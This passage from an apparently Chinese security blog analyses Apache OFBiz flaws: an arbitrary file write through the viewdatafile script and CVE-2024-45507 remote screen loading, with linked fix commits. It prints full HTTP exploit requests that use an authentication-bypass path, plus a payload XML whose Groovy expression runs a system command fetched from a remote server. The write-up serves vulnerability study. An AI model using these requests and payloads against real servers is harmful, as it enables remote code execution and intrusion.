<span class=n>messages</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>e</span><span class=o>.</span><span class=na>getMessage</span><span class=o>())</span>
<span class=o>}</span>
<span class=n>definitionNames</span> <span class=o>=</span> <span class=kc>null</span>
<span class=nf>if</span> <span class=o>(</span><span class=n>definitionUrl</span><span class=o>)</span> <span class=o>{</span>
<span class=k>try</span> <span class=o>{</span>
<span class=n>ModelDataFileReader</span> <span class=n>reader</span> <span class=o>=</span> <span class=n>ModelDataFileReader</span><span class=o>.</span><span class=na>getModelDataFileReader</span><span class=o>(</span><span class=n>definitionUrl</span><span class=o>)</span>
<span class=k>if</span> <span class=o>(</span><span class=n>reader</span><span class=o>)</span> <span class=o>{</span>
<span class=n>definitionNames</span> <span class=o>=</span> <span class=o>((</span><span class=n>Collection</span><span class=o>)</span><span class=n>reader</span><span class=o>.</span><span class=na>getDataFileNames</span><span class=o>()).</span><span class=na>iterator</span><span class=o>()</span>
<span class=n>context</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=s>"definitionNames"</span><span class=o>,</span> <span class=n>definitionNames</span><span class=o>)</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=k>catch</span> <span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>)</span> <span class=o>{</span>
<span class=n>messages</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>e</span><span class=o>.</span><span class=na>getMessage</span><span class=o>())</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=n>dataFile</span> <span class=o>=</span> <span class=kc>null</span>
<span class=nf>if</span> <span class=o>(</span><span class=n>dataFileUrl</span> <span class=o>&&</span> <span class=n>definitionUrl</span> <span class=o>&&</span> <span class=n>definitionNames</span><span class=o>)</span> <span class=o>{</span>
<span class=k>try</span> <span class=o>{</span>
<span class=n>dataFile</span> <span class=o>=</span> <span class=n>DataFile</span><span class=o>.</span><span class=na>readFile</span><span class=o>(</span><span class=n>dataFileUrl</span><span class=o>,</span> <span class=n>definitionUrl</span><span class=o>,</span> <span class=n>definitionName</span><span class=o>)</span>
<span class=n>context</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=s>"dataFile"</span><span class=o>,</span> <span class=n>dataFile</span><span class=o>)</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=k>catch</span> <span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=n>messages</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>e</span><span class=o>.</span><span class=na>toString</span><span class=o>());</span> <span class=n>Debug</span><span class=o>.</span><span class=na>log</span><span class=o>(</span><span class=n>e</span><span class=o>)</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
|
|||
|
|
<span class=k>if</span> <span class=o>(</span><span class=n>dataFile</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=n>modelDataFile</span> <span class=o>=</span> <span class=n>dataFile</span><span class=o>.</span><span class=na>getModelDataFile</span><span class=o>()</span>
|
|||
|
|
<span class=n>context</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=s>"modelDataFile"</span><span class=o>,</span> <span class=n>modelDataFile</span><span class=o>)</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
|
|||
|
|
<span class=k>if</span> <span class=o>(</span><span class=n>dataFile</span> <span class=o>&&</span> <span class=n>dataFileSave</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=k>try</span> <span class=o>{</span>
|
|||
|
|
<span class=n>dataFile</span><span class=o>.</span><span class=na>writeDataFile</span><span class=o>(</span><span class=n>dataFileSave</span><span class=o>)</span>
|
|||
|
|
<span class=n>messages</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>uiLabelMap</span><span class=o>.</span><span class=na>WebtoolsDataFileSavedTo</span> <span class=o>+</span> <span class=n>dataFileSave</span><span class=o>)</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=k>catch</span> <span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=n>messages</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>e</span><span class=o>.</span><span class=na>getMessage</span><span class=o>())</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
|
|||
|
|
<span class=k>if</span> <span class=o>(</span><span class=n>dataFile</span> <span class=o>&&</span> <span class=n>entityXmlFileSave</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=k>try</span> <span class=o>{</span>
|
|||
|
|
<span class=c1>//dataFile.writeDataFile(entityXmlFileSave)</span>
|
|||
|
|
<span class=n>DataFile2EntityXml</span><span class=o>.</span><span class=na>writeToEntityXml</span><span class=o>(</span><span class=n>entityXmlFileSave</span><span class=o>,</span> <span class=n>dataFile</span><span class=o>)</span>
|
|||
|
|
<span class=n>messages</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>uiLabelMap</span><span class=o>.</span><span class=na>WebtoolsDataEntityFileSavedTo</span> <span class=o>+</span> <span class=n>entityXmlFileSave</span><span class=o>)</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=k>catch</span> <span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=n>messages</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>e</span><span class=o>.</span><span class=na>getMessage</span><span class=o>())</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=n>context</span><span class=o>.</span><span class=na>messages</span> <span class=o>=</span> <span class=n>messages</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>代码很简单:脚本先后从两个远程url加载文件(数据文件和定义文件),然后把结果保存到请求指定的位置;从这段脚本看,保存路径没有经过任何校验,因此可随意保存到指定位置写Webshell。复现如下:</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=nf>POST</span> <span class=nn>/webtools/control/forgotPassword/viewdatafile</span> <span class=kr>HTTP</span><span class=o>/</span><span class=m>1.1</span>
|
|||
|
|
<span class=na>Host</span><span class=o>:</span><span class=l> </span>
|
|||
|
|
<span class=na>Cookie</span><span class=o>:</span> <span class=l>JSESSIONID=842FA87866E065DFD2FC7B92C84E48B8.jvm1; OFBiz.Visitor=10000</span>
|
|||
|
|
<span class=na>Cache-Control</span><span class=o>:</span> <span class=l>max-age=0</span>
|
|||
|
|
<span class=na>Sec-Ch-Ua</span><span class=o>:</span> <span class=l>"Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"</span>
|
|||
|
|
<span class=na>Sec-Ch-Ua-Mobile</span><span class=o>:</span> <span class=l>?0</span>
|
|||
|
|
<span class=na>Sec-Ch-Ua-Platform</span><span class=o>:</span> <span class=l>"macOS"</span>
|
|||
|
|
<span class=na>Upgrade-Insecure-Requests</span><span class=o>:</span> <span class=l>1</span>
|
|||
|
|
<span class=na>User-Agent</span><span class=o>:</span> <span class=l>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36</span>
|
|||
|
|
<span class=na>Accept</span><span class=o>:</span> <span class=l>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</span>
|
|||
|
|
<span class=na>Sec-Fetch-Site</span><span class=o>:</span> <span class=l>none</span>
|
|||
|
|
<span class=na>Sec-Fetch-Mode</span><span class=o>:</span> <span class=l>navigate</span>
|
|||
|
|
<span class=na>Sec-Fetch-User</span><span class=o>:</span> <span class=l>?1</span>
|
|||
|
|
<span class=na>Sec-Fetch-Dest</span><span class=o>:</span> <span class=l>document</span>
|
|||
|
|
<span class=na>Accept-Encoding</span><span class=o>:</span> <span class=l>gzip, deflate, br</span>
|
|||
|
|
<span class=na>Accept-Language</span><span class=o>:</span> <span class=l>zh-CN,zh;q=0.9</span>
|
|||
|
|
<span class=na>Priority</span><span class=o>:</span> <span class=l>u=0, i</span>
|
|||
|
|
<span class=na>Connection</span><span class=o>:</span> <span class=l>keep-alive</span>
|
|||
|
|
<span class=na>Content-Type</span><span class=o>:</span> <span class=l>application/x-www-form-urlencoded</span>
|
|||
|
|
<span class=na>Content-Length</span><span class=o>:</span> <span class=l>187</span>
|
|||
|
|
|
|||
|
|
DATAFILE_LOCATION=http://127.0.0.1:8081/1.xml&DEFINITION_IS_URL=1&DATAFILE_IS_URL=1&DEFINITION_LOCATION=http://127.0.0.1:8081/2.xml&DATAFILE_SAVE=/tmp/2.txt&DEFINITION_NAME=TaxwareOutHead
|
|||
|
|
</pre></div>
|
|||
|
|
<p>2.xml文件内容:</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=cp><?xml version="1.0" encoding="UTF-8"?></span>
|
|||
|
|
<span class=nt><data-files</span> <span class=na>xmlns:xsi=</span><span class=s>"http://www.w3.org/2001/XMLSchema-instance"</span>
|
|||
|
|
<span class=na>xsi:noNamespaceSchemaLocation=</span><span class=s>"https://ofbiz.apache.org/dtds/datafiles.xsd"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><data-file</span> <span class=na>name=</span><span class=s>"TaxwareOutHead"</span> <span class=na>type-code=</span><span class=s>"001"</span> <span class=na>record-length=</span><span class=s>"21"</span> <span class=na>separator-style=</span><span class=s>"fixed-record"</span> <span class=na>start-line=</span><span class=s>"0"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><record</span> <span class=na>name=</span><span class=s>"outHead"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><field</span> <span class=na>name=</span><span class=s>"COMPRESSION_INDICATOR"</span> <span class=na>position=</span><span class=s>"1"</span> <span class=na>length=</span><span class=s>"20"</span> <span class=na>type=</span><span class=s>"String"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt></record></span>
|
|||
|
|
<span class=nt></data-file></span>
|
|||
|
|
<span class=nt></data-files></span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>1.xml文件内容:</p>
|
|||
|
|
<pre><code>123456789012345678901</code></pre>
|
|||
|
|
<p>(这里需要注意下2.xml和1.xml对应的record-length和length)上面将<code>23456789012345678901</code>内容写入到<code>/tmp/2.txt</code>文件中。</p>
|
|||
|
|
<p>最新版的Ofbiz(18.12.16)引入了视图权限校验,对应的修复commit如下:<a href=https://github.com/apache/ofbiz-framework/commit/ab78769c2d7f22bd2ca8cc77b6be4f71d8bba24f target=_blank>https://github.com/apache/ofbiz-framework/commit/ab78769c2d7f22bd2ca8cc77b6be4f71d8bba24f</a></p>
|
|||
|
|
<p>其实这个修复issue在上个版本,也就是修复CVE-2024-38856的时候就提过,不过看样子是官方觉得麻烦,就直接给ProgramExport screen加了权限。下面的CVE-2024-45507漏洞,也有一部分利用了这个screen覆盖功能。</p>
|
|||
|
|
<h2 id=toc-2>CVE-2024-45507</h2>
|
|||
|
|
<p>漏洞的修复commit在:<a href=https://github.com/apache/ofbiz-framework/commit/ffb1bc487983fa672ac4fbeccf7ed7175e2accd3 target=_blank>https://github.com/apache/ofbiz-framework/commit/ffb1bc487983fa672ac4fbeccf7ed7175e2accd3</a></p>
|
|||
|
|
<p>该漏洞的成因是允许远程加载文件来渲染screen,比如如下这个<code>screen</code>:</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=nt><screen</span> <span class=na>name=</span><span class=s>"StatsSinceStart"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><section></span>
|
|||
|
|
<span class=nt><actions></span>
|
|||
|
|
<span class=nt><set</span> <span class=na>field=</span><span class=s>"titleProperty"</span> <span class=na>value=</span><span class=s>"WebtoolsStatsMainPageTitle"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt><set</span> <span class=na>field=</span><span class=s>"tabButtonItem"</span> <span class=na>value=</span><span class=s>"stats"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt><script</span> <span class=na>location=</span><span class=s>"component://webtools/groovyScripts/stats/StatsSinceStart.groovy"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt></actions></span>
|
|||
|
|
<span class=nt><widgets></span>
|
|||
|
|
<span class=nt><decorator-screen</span> <span class=na>name=</span><span class=s>"StatsDecorator"</span> <span class=na>location=</span><span class=s>"${parameters.statsDecoratorLocation}"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><decorator-section</span> <span class=na>name=</span><span class=s>"body"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><section></span>
|
|||
|
|
<span class=nt><widgets></span>
|
|||
|
|
<span class=nt><container</span> <span class=na>style=</span><span class=s>"page-title"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><label</span> <span class=na>text=</span><span class=s>"${uiLabelMap[titleProperty]}"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt></container></span>
|
|||
|
|
<span class=nt><include-menu</span> <span class=na>name=</span><span class=s>"StatsSinceStart"</span> <span class=na>location=</span><span class=s>"component://webtools/widget/Menus.xml"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt><label></span>${uiLabelMap.WebtoolsStatsCurrentTime} ${nowTimestamp}<span class=nt></label></span>
|
|||
|
|
<span class=nt><screenlet</span> <span class=na>title=</span><span class=s>"${uiLabelMap.WebtoolsStatsRequestStats}"</span> <span class=na>padded=</span><span class=s>"false"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><include-grid</span> <span class=na>name=</span><span class=s>"ListRequestStats"</span> <span class=na>location=</span><span class=s>"component://webtools/widget/StatsForms.xml"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt></screenlet></span>
|
|||
|
|
<span class=nt><screenlet</span> <span class=na>title=</span><span class=s>"${uiLabelMap.WebtoolsStatsEventStats}"</span> <span class=na>padded=</span><span class=s>"false"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><include-grid</span> <span class=na>name=</span><span class=s>"ListEventStats"</span> <span class=na>location=</span><span class=s>"component://webtools/widget/StatsForms.xml"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt></screenlet></span>
|
|||
|
|
<span class=nt><screenlet</span> <span class=na>title=</span><span class=s>"${uiLabelMap.WebtoolsStatsViewStats}"</span> <span class=na>padded=</span><span class=s>"false"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><include-grid</span> <span class=na>name=</span><span class=s>"ListViewStats"</span> <span class=na>location=</span><span class=s>"component://webtools/widget/StatsForms.xml"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt></screenlet></span>
|
|||
|
|
<span class=nt></widgets></span>
|
|||
|
|
<span class=nt></section></span>
|
|||
|
|
<span class=nt></decorator-section></span>
|
|||
|
|
<span class=nt></decorator-screen></span>
|
|||
|
|
<span class=nt></widgets></span>
|
|||
|
|
<span class=nt></section></span>
|
|||
|
|
<span class=nt></screen></span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>xml文件配置中有一段<code><decorator-screen name="StatsDecorator" location="${parameters.statsDecoratorLocation}"></code>,其中<code>location</code>的值取自<code>parameters</code>中的<code>statsDecoratorLocation</code>。这里就是一个二次模板注入的问题:当程序加载到这个xml文件的时候,会对上面这一段再渲染一次,对应的代码如下:</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=kd>public</span> <span class=kt>void</span> <span class=nf>renderWidgetString</span><span class=o>(</span><span class=n>Appendable</span> <span class=n>writer</span><span class=o>,</span> <span class=n>Map</span><span class=o><</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>></span> <span class=n>context</span><span class=o>,</span> <span class=n>ScreenStringRenderer</span> <span class=n>screenStringRenderer</span><span class=o>)</span> <span class=kd>throws</span> <span class=n>GeneralException</span><span class=o>,</span> <span class=n>IOException</span> <span class=o>{</span>
|
|||
|
|
<span class=kt>boolean</span> <span class=n>condTrue</span> <span class=o>=</span> <span class=kc>true</span><span class=o>;</span>
|
|||
|
|
<span class=k>if</span> <span class=o>(</span><span class=k>this</span><span class=o>.</span><span class=na>condition</span> <span class=o>!=</span> <span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=k>if</span> <span class=o>(!</span><span class=k>this</span><span class=o>.</span><span class=na>condition</span><span class=o>.</span><span class=na>eval</span><span class=o>(</span><span class=n>context</span><span class=o>))</span> <span class=o>{</span>
|
|||
|
|
<span class=n>condTrue</span> <span class=o>=</span> <span class=kc>false</span><span class=o>;</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=k>if</span> <span class=o>(</span><span class=n>condTrue</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=n>AbstractModelAction</span><span class=o>.</span><span class=na>runSubActions</span><span class=o>(</span><span class=k>this</span><span class=o>.</span><span class=na>actions</span><span class=o>,</span> <span class=n>context</span><span class=o>);</span>
|
|||
|
|
|
|||
|
|
<span class=k>try</span> <span class=o>{</span>
|
|||
|
|
<span class=n>screenStringRenderer</span><span class=o>.</span><span class=na>renderSectionBegin</span><span class=o>(</span><span class=n>writer</span><span class=o>,</span> <span class=n>context</span><span class=o>,</span> <span class=k>this</span><span class=o>);</span>
|
|||
|
|
|
|||
|
|
<span class=n>renderSubWidgetsString</span><span class=o>(</span><span class=k>this</span><span class=o>.</span><span class=na>subWidgets</span><span class=o>,</span> <span class=n>writer</span><span class=o>,</span> <span class=n>context</span><span class=o>,</span> <span class=n>screenStringRenderer</span><span class=o>);</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>其实全局搜索一下系统中与<code><decorator-screen name="StatsDecorator" location="${parameters.statsDecoratorLocation}"></code>类似的结构,可以观察到绝大多数都是<code><decorator-screen name="main-decorator" location="${parameters.mainDecoratorLocation}"></code>,也就是用的是<code>mainDecoratorLocation</code>这个参数,但这个参数利用不了,可以简单看一下context中<code>parameters</code>参数赋值的逻辑:</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=kd>public</span> <span class=kd>static</span> <span class=n>Map</span><span class=o><</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>></span> <span class=nf>getCombinedMap</span><span class=o>(</span><span class=n>HttpServletRequest</span> <span class=n>request</span><span class=o>,</span> <span class=n>Set</span><span class=o><?</span> <span class=kd>extends</span> <span class=n>String</span><span class=o>></span> <span class=n>namesToSkip</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=n>Map</span><span class=o><</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>></span> <span class=n>combinedMap</span> <span class=o>=</span> <span class=k>new</span> <span class=n>HashMap</span><span class=o><>();</span>
|
|||
|
|
<span class=n>combinedMap</span><span class=o>.</span><span class=na>putAll</span><span class=o>(</span><span class=n>getParameterMap</span><span class=o>(</span><span class=n>request</span><span class=o>));</span> <span class=c1>// parameters override nothing</span>
|
|||
|
|
<span class=n>combinedMap</span><span class=o>.</span><span class=na>putAll</span><span class=o>(</span><span class=n>getServletContextMap</span><span class=o>(</span><span class=n>request</span><span class=o>,</span> <span class=n>namesToSkip</span><span class=o>));</span> <span class=c1>// bottom level application attributes</span>
|
|||
|
|
<span class=n>combinedMap</span><span class=o>.</span><span class=na>putAll</span><span class=o>(</span><span class=n>getSessionMap</span><span class=o>(</span><span class=n>request</span><span class=o>,</span> <span class=n>namesToSkip</span><span class=o>));</span> <span class=c1>// session overrides application</span>
|
|||
|
|
<span class=n>combinedMap</span><span class=o>.</span><span class=na>putAll</span><span class=o>(</span><span class=n>getAttributeMap</span><span class=o>(</span><span class=n>request</span><span class=o>));</span> <span class=c1>// attributes trump them all</span>
|
|||
|
|
|
|||
|
|
<span class=k>return</span> <span class=n>combinedMap</span><span class=o>;</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>由于<code>mainDecoratorLocation</code>在<code>web.xml</code>中定义了,所以在执行到第二个语句,也就是<code>combinedMap.putAll(getServletContextMap(request, namesToSkip));</code>的时候,会将请求参数中的<code>mainDecoratorLocation</code>给覆盖成默认值,因此不可控。换句话说,后面的<code>putAll</code>会覆盖前面写入的同名键,请求参数的优先级最低;只有没有被后面几层定义的参数名,才会保留请求中传入的值。</p>
|
|||
|
|
<p>最后复现如下:</p>
|
|||
|
|
<pre><code>POST /webtools/control/forgotPassword/StatsSinceStart HTTP/1.1
|
|||
|
|
Host:
|
|||
|
|
Cookie: JSESSIONID=64FB07C6F3A047C4B6760B23070A03C0.jvm1; OFBiz.Visitor=10000
|
|||
|
|
Cache-Control: max-age=0
|
|||
|
|
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
|
|||
|
|
Sec-Ch-Ua-Mobile: ?0
|
|||
|
|
Sec-Ch-Ua-Platform: "macOS"
|
|||
|
|
Upgrade-Insecure-Requests: 1
|
|||
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
|
|||
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
|||
|
|
Sec-Fetch-Site: none
|
|||
|
|
Sec-Fetch-Mode: navigate
|
|||
|
|
Sec-Fetch-User: ?1
|
|||
|
|
Sec-Fetch-Dest: document
|
|||
|
|
Accept-Encoding: gzip, deflate, br
|
|||
|
|
Accept-Language: zh-CN,zh;q=0.9
|
|||
|
|
Priority: u=0, i
|
|||
|
|
Connection: keep-alive
|
|||
|
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
|
Content-Length: 56
|
|||
|
|
|
|||
|
|
statsDecoratorLocation=http://127.0.0.1:8081/payload.xml</code></pre>
|
|||
|
|
<p><code>payload.xml</code>文件内容为:</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=cp><?xml version="1.0" encoding="UTF-8"?></span>
|
|||
|
|
<span class=nt><screens</span> <span class=na>xmlns:xsi=</span><span class=s>"http://www.w3.org/2001/XMLSchema-instance"</span>
|
|||
|
|
<span class=na>xmlns=</span><span class=s>"http://ofbiz.apache.org/Widget-Screen"</span> <span class=na>xsi:schemaLocation=</span><span class=s>"http://ofbiz.apache.org/Widget-Screen"</span> <span class=err>http://ofbiz.apache.org/dtds/widget-screen.xsd"</span><span class=nt>></span>
|
|||
|
|
|
|||
|
|
<span class=nt><screen</span> <span class=na>name=</span><span class=s>"StatsDecorator"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><section></span>
|
|||
|
|
<span class=nt><actions></span>
|
|||
|
|
<span class=nt><set</span> <span class=na>field=</span><span class=s>"headerItem"</span> <span class=na>value=</span><span class=s>"${groovy:throw new Exception('open -a Calculator'.execute().text);}"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt><entity-one</span> <span class=na>entity-name=</span><span class=s>"FinAccount"</span> <span class=na>value-field=</span><span class=s>"finAccount"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt></actions></span>
|
|||
|
|
<span class=nt></section></span>
|
|||
|
|
<span class=nt></screen></span>
|
|||
|
|
|
|||
|
|
<span class=nt></screens></span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p><a id=img0 href=https://xzfile.aliyuncs.com/media/upload/picture/20240909110145-d937bc8a-6e57-1.png><img src="data:image/png;base64,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
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div id=waf_nc_block style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
|
|||
|
|
* Pico.css v1.5.6 (https://picocss.com)
|
|||
|
|
* Copyright 2019-2022 - Licensed under MIT
|
|||
|
|
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media 
(min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color 
Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c
|